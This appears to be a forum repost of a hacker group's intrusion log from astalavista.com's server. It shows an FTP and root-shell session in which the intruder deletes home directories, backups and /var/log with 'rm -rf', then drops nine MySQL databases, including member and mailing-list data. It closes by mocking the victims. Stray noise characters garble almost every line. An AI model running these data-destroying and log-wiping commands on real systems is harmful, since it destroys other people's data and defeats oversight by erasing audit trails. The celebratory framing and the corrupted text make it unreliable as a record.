-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar/ v) b$ Y$ n. {
[snip]
7 N' W0 {% c# a) B3 `% r% W226 Transfer complete.6 Y; ?" a. Y& E9 |, m. h1 @- c/ v
ftp> mdelete *
6 [# r4 a; O1 s4 D" Xftp> ls -la
( H& i' j2 @2 N* P227 Entering Passive Mode (212,254,194,163,2,193)/ m7 s( ~" u% T( b6 W1 @
150 Opening BINARY mode data connection for ‘file list’.
0 |8 v" Y% l& U$ D7 P% i X226 Transfer complete.8 O) k) f2 Q+ H* u3 }( a. G
ftp>/ F$ u) x" E; w: T0 W
, P; U7 }" q; C* e, fsh-3.2# cd /home
2 V1 a1 m+ [, }3 e( \sh-3.2# ls -la
. t" N0 k2 v2 W$ o& Ztotal 120; S4 X2 m# i& }) p& o- I3 u
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
! | L3 T% i5 A T! K( G* ]drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
# n$ n' b4 b; ~9 j ndrwx–x–x 9 admin admin 4096 Nov 28 2007 admin( y6 C- |7 ]: ?5 J- b. f
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
# W' F& l6 ]! M* R" t- }-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
! o' F7 A4 b) p8 O8 K4 C- ?3 y0 mdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
j0 D9 K `# J2 hdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup1 i. i1 V; _) Z7 b/ o: I6 J
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
1 L/ q& ^9 p. O2 Mdrwx–x–x 10 com com 4096 Apr 28 12:40 com
9 [$ b% Z2 L2 a& }9 a, [drwxr-xr-x 2 root root 4096 May 17 2007 ftp$ |- A H9 a9 `1 J# J8 A! J& `+ w
drwx—— 3 jon jon 4096 Sep 21 2007 jon1 a! c4 @/ N' u. E* f
drwx—— 2 root root 16384 Sep 11 2007 lost+found7 U2 w2 x5 M9 t+ Z1 \/ s
drwxr-xr-x 2 root root 4096 Sep 14 2007 my! Y6 Y2 B9 V$ {
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
; \- ]6 }) p: Z2 B0 E2 P1 |8 odrwx—— 2 jon jon 4096 Sep 15 2007 test; J9 c' j/ e& a( B$ m" y
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
% D: n4 x; A' d% t' f- J0 {& {$ S; y: F5 l. e l+ Y
sh-3.2# rm -rf backup/
& q9 X3 b! }+ T0 Msh-3.2# rm -rf backup.14161/
! J7 t- h5 X/ J0 Fsh-3.2# rm -rf ftp/( ~6 x, X5 \ h3 @; U& r
sh-3.2# rm -rf jon/
9 |% k% E: |6 B- Ash-3.2# rm -rf my/
- n2 X$ x# M6 K% {; _sh-3.2# rm -rf mysqldata/1 ]. M* o# f3 l6 h2 n
sh-3.2# rm -rf test/8 k! z( d* K- T% {
sh-3.2# rm -rf tmp/+ ~: {5 }) ~. @ A ^& H/ ?
sh-3.2# cd ~- v1 y/ \' ?; @0 F P+ E7 a$ o" C8 m8 I
sh-3.2# rm -rf *
/ m. c/ M5 g+ H! x3 E6 M$ Z1 q+ Ksh-3.2# rm -rf /var/log/3 O, B7 s7 d0 E4 {0 j. J& F
rm: cannot remove directory `/var/log//proftpd’: Directory not empty9 k9 m9 i: z3 S- A' e& Z- U# T) `
sh-3.2# rm -rf /home/*
: O6 y6 d" ^ K- j& d, jsh-3.2# mysql
' i1 q& m0 ]4 RWelcome to the MySQL monitor. Commands end with ; or \g.
5 ^ [' i) F3 L8 O6 f" HYour MySQL connection id is 407156
% Q3 L; }7 K5 _, p2 C- I p4 xServer version: 5.0.45-community-log MySQL Community Edition (GPL)
; d; M8 s5 @: S, I* U, k: K1 y6 i, `
: C: @/ L4 y2 u- W' @Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer., W4 Q% t, K0 W9 m" f v
5 a5 U8 s- X0 G+ B& v
mysql> show databases;& L# O: e3 q- W. A+ \# B0 x
+———————–+( \+ ^5 B- T+ j" @! j
| Database |! M9 Z4 H) |; P; f
+———————–+3 O* l; O( }' a
| information_schema |
3 x5 w$ Y" h' X# a' L5 `| astanet_ads |
: ?+ E) \* W1 e& {- p| astanet_mailing_lists |
$ P# f" O# o4 e0 z% F3 R. n3 F| astanet_mediawiki |4 u% b! P& m% i
| astanet_membersystem |( j- P, e# a, g
| com_contrexx |/ h& O2 O/ {' g& f4 Q2 N u) X
| com_contrexx2 |
$ B- p* ]. e( c7 k4 ^| com_contrexx2_live |8 A. w$ R; Q d/ l6 S( l. C
| da_roundcube |
# D' J$ b: Z$ e' B+ I0 ]| dolphin |
4 o) z' m: ] h1 A4 T$ _| ideapool |
+ X$ W' q* {' Y a| mysql |( v( w$ S* J' ?5 r) D5 e: Y
| test |3 h, N5 [$ u4 K# u
| yourmaster |3 s" P8 [, s G# D N4 {
+———————–+8 k. R; d( v/ K' {; Y
14 rows in set (0.03 sec). p# H: e* B5 q7 y$ c: i% F' z
$ e0 D6 w9 P& tmysql> drop database astanet_membersystem;% q7 P1 p! t: C1 n+ b
droQuery OK, 46 rows affected (0.81 sec)
Z; h) l8 Z& P) g7 B- l+ P: E
: a. c/ Z- h. b7 amysql> drop database com_contrexx;
7 ^0 R Z6 c3 b* ZQuery OK, 211 rows affected (2.72 sec)) z2 x+ u! i1 m" m. s1 u
/ I5 e ?7 _# w0 E7 A- m9 C& \2 W Rmysql> drop database com_contrexx2;
5 N E& [& T: |5 a, V/ O. CQuery OK, 237 rows affected (2.23 sec)
9 i# q0 E' S H8 S" `" ^3 h
9 n5 Y3 d4 S: \, d' C! {. _; Hmysql> drop database com_contrexx2_live;
) V/ m4 Y; W# g( Q% F% {, HQuery OK, 227 rows affected (7.63 sec)
! i) e* O: H8 P" F8 R
1 t6 K' J# V% V( N: `mysql> drop database ideapool;
/ o/ \$ S$ _4 xQuery OK, 69 rows affected (0.19 sec)) {& C0 ]/ K9 ?, Z, y& A4 r) y) r y. y
4 Z; k+ M* w! [3 E
mysql> drop database yourmaster;0 X6 j2 a5 c" P. a4 x
Query OK, 158 rows affected (0.55 sec)* [* a: z% W) J6 D
* a1 f9 |& \: o4 q
mysql> drop database astanet_ads;
) S C$ h" C; x0 _' c4 iQuery OK, 9 rows affected (0.11 sec)5 L7 P4 W% B, a
8 {/ E4 `4 O! Z Nmysql> drop database astanet_mailing_lists;; x8 G/ _* r7 Y
Query OK, 24 rows affected (1.47 sec). E; M) ?" L3 F3 Z$ \6 o- p
! }* z e3 r2 M* R7 Z+ e: Z
mysql> drop database astanet_mediawiki;0 e B2 p% a& N
Query OK, 31 rows affected (0.51 sec)2 |4 Z$ @2 _% J
5 y9 x6 I9 q5 umysql> show databases;. F) t2 m+ d; Q. j0 t; D7 h
+——————–+
+ g- T; h4 p, {0 t1 u% {* x| Database |
; Y. \: f9 e+ l- V3 U* [+——————–+# S, Q2 v% _& g1 K$ n# G" a
| information_schema |+ a8 y- ~; ~$ V5 q
| da_roundcube |
6 H# S5 |" r4 [ Y| dolphin |
% A. h* P# W O7 W+ ^| mysql |
_. }* t$ Q/ f, |- O& y) @+ J| test |
$ o; m9 P7 z+ p4 ^0 i5 b+——————–+) {# x( H" } [3 Z8 ^) J
5 rows in set (0.00 sec)/ c2 x' o0 P5 g9 h" O
; }# f1 v' Z3 o7 {: O* V6 R
What a journey! We’re not sure exactly why the “Terminator” had any influence on, E; _6 f- b/ f9 Z2 }, x
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
4 {7 c, M2 ~5 l9 uwrong to say this pack of morons *wont be back*.
, B" G& r& ?+ t; P0 X! t; x6 [ |
发表于 2012-11-6 21:07:34
收藏
支持
反对